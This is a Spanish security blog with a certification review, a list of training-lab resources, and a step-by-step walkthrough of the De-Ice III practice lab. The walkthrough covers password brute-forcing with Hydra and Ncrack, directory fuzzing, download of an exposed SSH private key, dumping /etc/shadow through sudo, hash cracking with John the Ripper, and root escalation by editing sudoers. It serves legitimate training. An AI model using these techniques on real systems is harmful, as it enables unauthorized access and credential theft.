Sec-Track » Penetration Test

Certified Professional Penetration Tester

S3cTr4ck — Thu, 26 Aug 2010 09:48:52 +0000

Muy pocas veces hablo sobre mis certificaciones o preparación formal realizada. Esto sobre todo, por el hecho de que no soy amante de los altos egos de algunos con respecto a estos temas. Otra razón muy importante es debido a que el hecho de tener una certificación o carrera profesional no garantiza en su totalidad que una persona tenga o no, los conocimientos necesarios para ejercer una labor. Soy de los que piensan que nada mejor que la práctica pura y dura para evaluar la experticia de las personas. Como decimos por ahí, “la práctica hace al maestro”.

Toco este tema, debido a que a lo largo de mi carrera profesional e investigaciones relacionadas en la seguridad de la información, he realizado diferentes certificaciones y preparaciones formales en estos campos. Una de estas corresponde al título de este post.

Esta prestigiosa certificación y que muchos se atreven a nombrar como “Penetration Testing Pro: the CEH killer” es ofrecida por el equipo de eLearnSecurity en un completo paquete de entrenamiento + certificación. El objetivo a lo largo de esta exigente preparación es aprender trabajando de manera práctica en cada uno de sus módulos propuestos.

SECTION 1 WEB APPLICATION SECURITY TESTING
OVERVIEW

Module 1: Introduction
Module 2: Information Gathering
Module 3: Vulnerability assessment
Module 4: Cross site scripting
Module 5: SQL Injection
Module 6: Advanced Web Attacks

SECTION 2 NETWORK SECURITY TESTING
OVERVIEW

Module 1: Information Gathering
Module 2: Scanning
Module 3: Enumeration
Module 4: Sniffing and MITM attacks
Module 5: The Exploitation show
Module 6: Anonymity

SECTION 3 SYSTEM SECURITY
OVERVIEW

Module 1: Introduction
Module 2: Cryptography and Password Cracking
Module 3: Buffer Overflow
Module 4: Shellcoding
Module 5: Malware
Module 6: Rootkit coding

Los detalles del curso son:

Online course—learn at your own pace
1000+ interactive slides
Learn methodology, be a professional
4 hours of videos
3 authors—3 sections
DVD Backtrack4 + Labs
Silver Certification
Qualifies you for 40 CPE

Un completo listado de las temáticas puede encontrarse en el documento Syllabus oficial.

Además de esto, en el web site The Ethical Network y en DarkNet han realizado unos completos reviews sobre el entrenamiento y la certificación, que puede ser de utilidad para quienes estén interesados en realizar este training.

Por este mismo medio estaré publicando mis experiencias, alguna parte del material de entrenamiento (videos, ppts, entornos, sources) y algunos de los ejercicios propuestos, con el objetivo de encontrar otras opiniones, sugerencias y compartir con quienes quieran parte de este valioso recurso y estén proyectando realizarlo de manera oficial.

Web oficial (Entrenamiento + Certificación) eLearnSecurity

Demo Training

Review (DarkNet)

Review (The Ethical Hacker Network)

Desarrollo del entorno De-Ice III – Acceso al Sistema y Elevación de Privilegios

S3cTr4ck — Tue, 01 Jun 2010 11:11:08 +0000

Continúa desde: Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades

Veamos ahora que podemos hacer con la información encontrada:

Index of /~pirrip//.ssh

 Name                    Last modified      Size  Description
 Parent Directory                             -
 id_rsa                  05-Jan-2008 20:29  1.6K
 id_rsa.pub              05-Jan-2008 20:29  393

Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80

Esta información corresponde a la llave digital de acceso del usuario pirrip, muy posiblemente al realizarse la copia de seguridad previa a la migración del sistema, esta se olvidó en el antiguo server.

Descarguemos los archivos:

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
–2010-06-01 02:11:32– http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 393 [text/plain]
Saving to: `id_rsa.pub’

100%[===========================================================>] 393 –.-K/s in 0s

2010-06-01 02:11:32 (44.7 MB/s) – `id_rsa.pub’ saved [393/393]

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa
–2010-06-01 02:11:46– http://192.168.2.101/~pirrip//.ssh/id_rsa
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1675 (1.6K) [text/plain]
Saving to: `id_rsa’

100%[===========================================================>] 1,675 –.-K/s in 0s

2010-06-01 02:11:46 (172 MB/s) – `id_rsa’ saved [1675/1675]

root@Sec-Track:~/De-Ice2.100# ls
id_rsa id_rsa.pub

Una vez descargadas las llaves, procedemos a copiarlas al directorio /foo/.ssh

root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/

root@Sec-Track:~/.ssh# ls
id_rsa id_rsa.pub known_hosts

Confirmamos que la llave corresponde al usuario pirrip

root@Sec-Track:~/.ssh# more id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== pirrip@slax

Por lo tanto realicemos la conexión al sistema objetivo!!

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
The authenticity of host ’192.168.2.100 (192.168.2.100)’ can’t be established.
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ’192.168.2.100′ (RSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for ‘/root/.ssh/id_rsa’ are too open.
It is recommended that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /root/.ssh/id_rsa
pirrip@192.168.2.100′s password:

Como vemos las llaves presentan un error de permisos… Por lo tanto cambiemos estos:

root@Sec-Track:~/.ssh# ls -la
total 20
drwx—— 2 root root 4096 Jun 1 02:18 .
drwxr-xr-x 77 root root 4096 Jun 1 02:09 ..
-r–r–r– 1 root root 1675 Jun 1 02:17 id_rsa
-r–r–r– 1 root root 393 Jun 1 02:17 id_rsa.pub
-rw-r–r– 1 root root 1768 Jun 1 02:21 known_hosts
root@Sec-Track:~/.ssh# chmod 000 id*
root@Sec-Track:~/.ssh# ls -la
total 20
drwx—— 2 root root 4096 Jun 1 02:18 .
drwxr-xr-x 77 root root 4096 Jun 1 02:09 ..
———- 1 root root 1675 Jun 1 02:17 id_rsa
———- 1 root root 393 Jun 1 02:17 id_rsa.pub
-rw-r–r– 1 root root 1768 Jun 1 02:21 known_hosts

Ahora si… Conectémonos al host

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$

Muy bien… Ya estamos dentro del sistema objetivo… Ahora como en todos los Test de Penetración que hemos realizado, tratemos de escalar privilegios.

pirrip@slax:~$ cat /etc/passwd
root :0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
pirrip :1000:10 hilip Pirrip:/home/pirrip:/bin/bash
magwitch :1001:100:Abel Magwitch:/home/magwitch:/bin/bash
havisham :1002:100:Estella Havisham:/home/havisham:/bin/bash

Vemos como nuestro usuario pirrip tiene el ID 10… Comprobemos entonces los grupos.

pirrip@slax:/tmp$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:

Por lo tanto podremos utilizar el comando sudo

pirrip@slax:/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Lamentablemente desconocemos nuestro password.

Ahora observaremos en detalle la versión del sistema objetivo y trataremos identificar alguna vulnerabilidad reportada, ubicar algún exploit y ejecutarlo desde la carpeta /tmp

pirrip@slax:~$ uname -r
2.6.16
pirrip@slax:~$ cd /tmp/
You have mail in /var/mail/pirrip

Para nuestra sorpresa, cuando decidí cambiarme a la carpeta /tmp recibí el mensaje de que tengo un email … Veamos de que se trata

pirrip@slax:/tmp$ mail
mailx version nail 11.25 7/29/05. Type ? for help.
“/var/mail/pirrip”: 7 messages 7 unread
>U 1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella
U 2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team
U 3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham
U 4 Estella Havisham   Mon Jan 14 00:05   21/871   next month
U 5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation
U 6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation
U 7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder
? 1
Message 1:
From magwitch@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path:
From: Abel Magwitch
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Will do.

?
Message 2:
From havisham@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path:
From: Estella Havisham
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Thanks! Glad to be here.

?
Message 3:
From magwitch@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path:
From: Abel Magwitch
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

I set her up with an accountus servers. I set her password to “changeme” and will swing by tomorrow and make sure she changes her pw.

?
Message 4:
From havisham@slax.example.net Mon Jan 14 00:05:15 2008
Return-Path:
From: Estella Havisham
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Abel filled me in about next month. I wanted to ask you if I can grab the week you get back for vacation? Thanks.

?
Message 5:
From magwitch@slax.example.net Mon Jan 14 00:05:15 2008
Return-Path:
From: Abel Magwitch
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Hey, I’ll be taking vacation the second week of next month. Have any additional tasks that need to be taen care of in advance?

?
Message 6:
From magwitch@slax.example.net Mon Jan 14 00:05:15 2008
Return-Path:
From: Abel Magwitch
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Sure – so far, she’s doing just fine. I have assigned her a couple web issues and the ftp installation for 2.100. She seems to be very comfortable, even with the new stuff.

?
Message 7:
From noreply@fermion.herot.net Mon Jan 14 00:05:15 2008
Return-Path:
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.

Regards,
Fermion Support

E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

Vemos que interesante información nos encontramos en el email 7 y 3 … Nuestro password y el de havisham!!

Intentemos nuevamente listar el contenido de passwd

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Sorry, user pirrip is not allowed to execute ‘/usr/bin/cat /etc/shadow’ as root on slax.

Parece que no tenemos disponible el comando cat.. Comprobemos entonces que comandos interesantes y de utilidad tenemos…

pirrip@slax:/tmp$ sudo bash
Sorry, user pirrip is not allowed to execute ‘/usr/bin/bash’ as root on slax.
pirrip@slax:/tmp$ sudo sh
Sorry, user pirrip is not allowed to execute ‘/bin/sh’ as root on slax.
pirrip@slax:/tmp$ sudo ls
Sorry, user pirrip is not allowed to execute ‘/usr/bin/ls’ as root on slax.
pirrip@slax:/tmp$ sudo nano
sudo: nano: command not found
pirrip@slax:/tmp$ sudo more
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 …
pirrip@slax:/tmp$ sudo vi

Perfecto, a pesar de no tener disponibles la mayoría de comandos, si tenemos disponibles 2 muy importantes!!! more y vi . Veamos que podemos hacer con estos.

pirrip@slax:/tmp$ sudo more /etc/shadow
Password:
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

Genial… Llevemos estos resultados a la herramienta de password cracking John The Ripper.

root@Sec-Track:/pentest/passwords/jtr# ./john –user=root –w=/root/passwords/verycool.lst 100.txt
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:00:08:49 100.00% (ETA: Tue Jun 1 04:48:21 2010) c/s: 4526 trying: aceguero

Lamentablemente no hemos dado con el password de root… Posiblemente sea un password complejo que no se encuentra incluido en nuestro diccionario.

Poniendo a prueba nuestra creatividad, veamos lo que podemos hacer con el comando vi sobre sudo.

pirrip@slax:/tmp$ sudo vi /etc/sudoers
Password:
reading /etc/sudoers

Allí modifico los permisos para nuestro usuario pirrip

# User privilege specification
root ALL=(ALL) ALL
pirrip ALL=(ALL) ALL

Ahora tenemos todos los permisos de sudo para ejecutar cualquier comando… Incluyendo el siguiente!!

pirrip@slax:/tmp$ sudo passwd root
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Ahora solo basta:

pirrip@slax:/tmp$ su
Password: ***********
root@slax:/tmp#

Para el próximo post veremos algunos otros métodos para comprometer este sistema…

Conferencia: Laboratorios de Entrenamiento en Seguridad Informática – FLISOL 2010

S3cTr4ck — Tue, 04 May 2010 01:52:15 +0000

El pasado 24 de abril tuve el placer de asistir como conferencista al Festival Internacional de Instalación de Software Libre desarrollado en Medellín.

La conferencia que presenté trató sobre la implementación de Laboratorios de Entrenamiento en Seguridad Informática, y de como el Proyecto Sec-Track puede ser una magnífica herramienta para cumplir con ese objetivo.

El contenido temático de dicha conferencia, es el siguiente:

Descripción del Proyecto Sec-Track
Por qué implementar laboratorios de entrenamiento?
- Facil inicio para aprendices
- Diferentes niveles de complejidad
- Portables
- Simulación de entornos reales
- Implicaciones legales
- Problemas de conexión
- Tiempo de desarrollo de escenarios
- Costos
- Tu lo construyes… Tu sabes como resolverlo
- Posibilidad de crear comunidad
Implementación de Hardware
- Computadores (Dispositivos)
- Herramientas de Red
- Cables
- Hubs
- Switches
- Routers
- Dispositivos de almacenamiento
- Firewalls
- Acces Points
- Reguladores eléctricos
Implementación de Software
- Virtualización
- VirtualBox
- XEN
- QEMU
- Virtual PC
- VMWare
- Diferentes S.O
- Tools
Laboratorios de Test de Penetración
- Evaluación activa de las medidas de seguridad de la información
- Metodologías
- ISSAF
- NIST SP 800-42
- EC-Council (CEH)
- De-Ice PenTest LiveCDs
- PwnOS
- DVL
- WebGOAT
- Damn Vulnerable Web App
- Sauron 1.0
- FoundStone
- BadStore
- TurnKey Linux
- Libros Recomendados
Laboratorios de Hardening
- Honeywall CD-Rom
- Labs Hardening Windows-GNU/Linux
- Libros Recomendados
Laboratorios de Análisis Forense Digital
- Retos Forenses UNAM
- Reto Forense Comunidad DragonJAR
- HoneyNet Project Challenges
- Libros Recomendados
Laboratorios de Análisis de Malware
- Windows-GNU/Linux
- Libros Recomendados
Muchos otros Entornos/Ideas/Posibilidades
- CTF
- Campus Party
- Criptogramas
- Crackmes
- Hackme
- WarGames

Laboratorios de Entrenamiento en Seguridad Informática – FLISOL 2010

View more presentations from 4v4t4r.

En el transcurso de algunos días estaré publicando en detalle cada uno de estos (y mucho más) entornos de entrenamiento, como objetivos de aprendizaje colaborativo en el Proyecto Sec-Track.

Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades

S3cTr4ck — Wed, 07 Apr 2010 03:06:12 +0000

Continúa desde: Desarrollo del entorno De-Ice III – Enumeración de usuarios

Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación a través de los servicios ofrecidos por el host. Veamos:

FTP

Hydra:

root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36

SSH

Hydra:

root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36

Ncrack:

root@bt:/usr/local/share/ncrack# ncrack 192.168.1.100:22 -P /pentest/passwords/wordlists/pass.txt

Después de mucho esperar mientras se llevaba a cabo los intentos de inicio de sesión con un usuario y password válido llegamos a la conclusión de que este no es un camino viable para acceder al sistema, pues las pruebas fueron realizadas con diccionarios en un comienzo básicos y compuestos por palabras comunes hasta diccionarios bastante robustos de millones de palabras, por lo tanto podemos afirmar que las contraseñas son complejas o los mecanismos de autenticación están medianamente asegurados.

Hagamos uso de varios identificadores de vulnerabilidades, configuraciones por defecto o archivos y directorios sensibles. Para ello primero usemos OWASP Dirbuster para identificar directorios y archivos.

Host 192.168.2.100

root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.100/ -r
DirBuster: option requires an argument — r
Starting OWASP DirBuster 0.12 in headless mode
Starting dir/file list based brute forcing
Dir found: / – 200
Dir found: /cgi-bin/ – 403
Dir found: /icons/ – 200
File found: /level.html – 200
File found: /copyright.txt – 200
File found: /index2.html – 200

Host 192.168.2.101

root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.101/ -r
DirBuster: option requires an argument — r
Starting OWASP DirBuster 0.12 in headless mode
Starting dir/file list based brute forcing
Dir found: / – 200
Dir found: /cgi-bin/ – 403
Dir found: /home/ – 403
Dir found: /icons/ – 200
File found: /200711_002.pdf – 200
File found: /200611_001.pdf – 200
File found: /200711_004.pdf – 200
File found: /Acceptable_Use_Policy.pdf – 200
File found: /Audit_Policy.pdf – 200
File found: /Email_Policy.pdf – 200

Ahora con Nikto en modo default

Host 192.168.2.100

root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.100
- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.2.100
+ Target Hostname:    slax.example.net
+ Target Port:        80
+ Start Time:         2010-03-13 17:14:41
—————————————————————————
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-0: DEBUG HTTP verb may show server debugging information
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3588 items checked: 8 item(s) reported on remote host
+ End Time:           2010-03-13 17:15:08 (27 seconds)
—————————————————————————
+ 1 host(s) tested

Host 192.168.2.101

root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.101
- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.2.101
+ Target Hostname:    192.168.2.101
+ Target Port:        80
+ Start Time:         2010-03-13 17:16:25
—————————————————————————
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3588 items checked: 7 item(s) reported on remote host
+ End Time:           2010-03-13 17:16:54 (29 seconds)
—————————————————————————
+ 1 host(s) tested

Además de las alertas sobre las versiones desactualizadas de software, podemos destacar la identificación del directorio de usuario root. (~root). Esto nos permite deducir que posiblemente existan diferentes directorios para los usuarios identificados. Veamos:

Con netcat

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~root/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:36:11 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 557
Connection: close
Content-Type: text/html

…

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:38:13 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 561
Connection: close
Content-Type: text/html

…

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:40:13 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 565
Connection: close
Content-Type: text/html

…

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:42:27 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 565
Connection: close
Content-Type: text/html

Otra herramienta que nos permite identificar posibles usuarios, archivos, directorios en un host, es la herramienta de Fuzzing JBroFuzz

Veamos:

Tenemos los posibles usuarios válidos del sistema:

pickwick
winkle
snodgrass
tupman
weller
tweller
havisham
magwitch
pirrip
nickleby
rnickleby
noggs
squeers
pinch
tapley
gamp
marley
scrooge
cratchit
sikes
dawkins
claypole
root

Los cuales a su vez pueden tener un directorio como el identificado para root

Basta entonces con agregarle el símbolo virgulilla (~) al comienzo de cada uno y anexarlo a las listas de fuzzing de JBroFuzz.

0,http://192.168.2.101/~pickwick,404,Not Found,No,No
1,http://192.168.2.101/~winkle,404,Not Found,No,No
2,http://192.168.2.101/~snodgrass,404,Not Found,No,No
3,http://192.168.2.101/~tupman,404,Not Found,No,No
4,http://192.168.2.101/~weller,404,Not Found,No,No
5,http://192.168.2.101/~tweller,404,Not Found,No,No
6,http://192.168.2.101/~havisham,200,OK,No,No
7,http://192.168.2.101/~magwitch,200,OK,No,No
8,http://192.168.2.101/~pirrip,200,OK,No,No
9,http://192.168.2.101/~nickleby,404,Not Found,No,No
10,http://192.168.2.101/~rnickleby,404,Not Found,No,No
11,http://192.168.2.101/~noggs,404,Not Found,No,No
12,http://192.168.2.101/~squeers,404,Not Found,No,No
13,http://192.168.2.101/~pinch,404,Not Found,No,No
14,http://192.168.2.101/~tapley,404,Not Found,No,No
15,http://192.168.2.101/~gamp,404,Not Found,No,No
16,http://192.168.2.101/~marley,404,Not Found,No,No
17,http://192.168.2.101/~scrooge,404,Not Found,No,No
18,http://192.168.2.101/~cratchit,404,Not Found,No,No
19,http://192.168.2.101/~sikes,404,Not Found,No,No
20,http://192.168.2.101/~dawkins,404,Not Found,No,No
21,http://192.168.2.101/~claypole,404,Not Found,No,No
22,http://192.168.2.101/~root,200,OK,No,No

Las líneas que están en negrita corresponden a ubicaciones reales y activas en el servidor objetivo

~havisham
~magwitch
~pirrip
~root

Hagamos ahora una exploración de directorios y archivos mediante JBroFuzz a los directorios raíz del server y de los usuarios identificados.

Al host 192.168.2.100

4,http://192.168.2.100//icons/,200,OK,No,No
784,http://192.168.2.100//index.php/123,200,OK,No,No
802,http://192.168.2.100//info.php,200,OK,No,No (Y)

Al host 192.1682.101

4,http://192.168.2.101//icons/,200,OK,No,No

Ahora a los directorios identificados para los usuarios:

Usuario havisham:

Ningún resultado de interés

Usuario magwitch:

Ningún resultado de interés

Usuario pirrip:

385,http://192.168.2.101/~pirrip//.ssh,200,OK,No,No

Usuario root:

Ningún resultado de interés

Vemos entonces como pudimos identificar la existencia del directorio .ssh para el usuario pirrip

http://192.168.2.101/~pirrip//.ssh/

Index of /~pirrip//.ssh

 Name                    Last modified      Size  Description
 Parent Directory                             -
 id_rsa                  05-Jan-2008 20:29  1.6K
 id_rsa.pub              05-Jan-2008 20:29  393

Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80

En el próximo post veremos como podemos utilizar la información obtenida para penetrar el sistema.

Turnkey Linux, Proyecto de Appliances para la Implementación de Laboratorios de Seguridad Informática

S3cTr4ck — Mon, 29 Mar 2010 23:23:24 +0000

Turnkey Linux es un proyecto Open Source de desarrollo de appliances libres para la implementación de plataformas tecnológicas . Estas appliances también pueden ser utilizadas para la implementación y puesta en marcha de Laboratorios de entrenamiento en Seguridad Informática.

Turnkey Linux pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas y plataformas tecnológicas de uso común en empresas, instituciones académicas y gobierno electrónico.

Estas imágenes (.iso y/o VMware) automáticamente una vez iniciadas pondrán en marcha el sistema que nosotros hayamos elegido. Habilitando además un perfecto sistema de administración como lo es Webmin (aunque podemos administrarlo normalmente de manera local).

Veamos un video demostrativo del proceso de ejecución de los entornos/appliances:

Dichos sistemas están basados en la distribución Ubuntu, por lo que el proceso de actualización y administración se facilitará en gran medida.

El uso de dicho proyecto como ambientes virtualizados de entrenamiento en seguridad es muy amplio. Pues con unos simple pasos (Descargar, bootear desde un equipo físico o máquina virtual) tendremos todo un entorno que asemejará uno real, para realizar las prácticas propuestas como entrenamiento (Hardening, Penetration Test, Análisis de Código en busca de vulnerabilidades, Análisis de Sistemas Criptográficos, Análisis Forense, CTF y Wargames).

Algunos de los entornos disponibles son:

ScreenShots del proyecto >>

Tutorial de Instalaciónen VirtualBox >>

Más información y descargas del Proyecto Turnkey Linux >>

Desarrollo del entorno De-Ice III – Enumeración de usuarios

S3cTr4ck — Fri, 12 Mar 2010 17:41:18 +0000

Continúa desde: Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning

Una vez hemos escaneado e identificados los servicios disponibles en los sistemas objetivos vamos a enumerar los posibles usuarios de estos.

Tenemos entonces dos host objetivos con los siguientes servicios y versiones disponibles:

192.168.2.100

21/tcp open   ftp      vsftpd 2.0.4
22/tcp open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp open   smtp     Sendmail 8.13.7/8.13.7
80/tcp open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https

192.168.2.101

80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)

Realicemos una exploración manual al sitio web 192.168.2.100 en busca de información sensible o de interés para nuestros propósitos:

En el sitio web podemos encontrarnos un directorio de personas involucradas con la empresa:

Development:
Samuel Pickwick – pickwick@herot.net
Nathaniel Winkle – winkle@herot.net
Augustus Snodgrass – snodgrass@herot.net
Tracy Tupman – tupman@herot.net
Sam Weller – weller@herot.net
Tony Weller – tweller@herot.net
